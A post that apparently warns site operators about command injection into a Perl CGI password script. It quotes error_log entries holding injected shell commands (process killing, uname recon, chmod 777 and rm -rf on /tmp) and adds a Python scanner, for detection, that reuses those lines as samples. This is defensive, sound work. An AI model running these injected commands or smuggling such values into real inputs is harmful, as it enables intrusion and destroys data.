Everyone should scan their error logs for this type of entry:
error_log:ERROR - can't open ;echo;kill -9 `pidof chucu mypt mykmod km3 kmod ptrace psybnc pt bru 0x82-Local.Qp0ppa55d ga raven bindtty gch .gch .bindtty`;exit
error_log:ERROR - can't open ;echo;uname -a;exit
error_log:ERROR - can't open ;echo;chmod -fR 777 /tmp /usr/tmp /var/tmp;rm -rf /tmp/*;rm -rf /tmp/.*;exit
error_log:ERROR - can't open ;echo;echo `gcc`;exit
error_log:ERROR - can't open ;echo;gcc;exit
error_log:ERROR - can't open ;echo;gcc
error_log:ERROR - can't open ;echo;echo c9sppkfp</body></html> at /home/NAMECHANGEDTOHIDEVICTIMSITE/cgi-bin/passes/epoch-pass-add.cgi line 87, <STDIN> line 1.
error_log:ERROR - can't open ;echo;echo c9sppkfp</body></html> at /home/NAMECHANGEDTOHIDEVICTIMSITE/cgi-bin/passes/epoch-pass-add.cgi line 87, <STDIN> line 1.
Here is a list of IPs you might want to block because this is the source address the hacker used on multiple occasions:
Those are all IPs I saw connected to the port the backdoor was running on. However, some could possibly be FTP sites they were trying to download something from or whatnot, not sure.
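A small log scanner for this pattern, added here as an example and not part of the original post: it flags Perl "can't open" errors whose argument begins with a shell metacharacter (the signature of input being pushed into a CGI's open() or shell call), splits out the injected command chain, and labels the obvious stages. The sample entries are copied from the post plus one constructed benign line; the STAGE_HINTS labels are my own.

```python
import re
from typing import Dict, List, Optional

# A Perl CGI that interpolates a user-supplied value into open() or a shell
# call echoes the whole value in its "can't open ..." error. An argument that
# starts with a shell metacharacter is a strong injection signal regardless
# of which commands follow, so that is the trigger, not a command blocklist.
CANT_OPEN_RE = re.compile(
    r"can't open\s+(?P<arg>.*?)"
    r"(?:\s+at\s+(?P<script>\S+)\s+line\s+(?P<line>\d+)|$)"
)
SHELL_META_RE = re.compile(r"^\s*(?:[;|&`]|\$\()")

# Labels for the first word of each injected command (my own naming).
STAGE_HINTS = {
    "uname": "host reconnaissance",
    "gcc": "compiler check",
    "kill": "process killing",
    "chmod": "permission change",
    "rm": "file removal",
}

def parse_entry(line: str) -> Optional[Dict]:
    """Return the injected command chain from one log line, or None if benign."""
    m = CANT_OPEN_RE.search(line)
    if not m or not SHELL_META_RE.search(m.group("arg")):
        return None
    # Drop the HTML footer the CGI had already printed before Perl raised the error.
    arg = re.sub(r"</body></html>.*$", "", m.group("arg"))
    commands = [c.strip() for c in arg.split(";") if c.strip()]
    stages = sorted({STAGE_HINTS[c.split()[0]] for c in commands
                     if c.split()[0] in STAGE_HINTS})
    return {"commands": commands, "stages": stages, "script": m.group("script"),
            "line": int(m.group("line")) if m.group("line") else None}

def scan(lines) -> List[Dict]:
    """Scan an iterable of error_log lines and keep only injection attempts."""
    return [e for e in (parse_entry(l) for l in lines) if e]

# Three entries from the post plus one constructed benign "file really missing" entry.
SAMPLE_LOG = [
    "error_log:ERROR - can't open ;echo;uname -a;exit",
    "error_log:ERROR - can't open ;echo;chmod -fR 777 /tmp /usr/tmp /var/tmp;rm -rf /tmp/*;rm -rf /tmp/.*;exit",
    "error_log:ERROR - can't open ;echo;echo c9sppkfp</body></html> at /home/NAMECHANGEDTOHIDEVICTIMSITE/cgi-bin/passes/epoch-pass-add.cgi line 87, <STDIN> line 1.",
    "error_log:ERROR - can't open /var/www/data/users.txt at /home/NAMECHANGEDTOHIDEVICTIMSITE/cgi-bin/report.cgi line 12.",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["script"], hit["line"], hit["stages"], hit["commands"])
```

Point it at a real file with `scan(open("error_log"))`; a hit with a `script` and `line` tells you exactly which CGI and which open() call to fix.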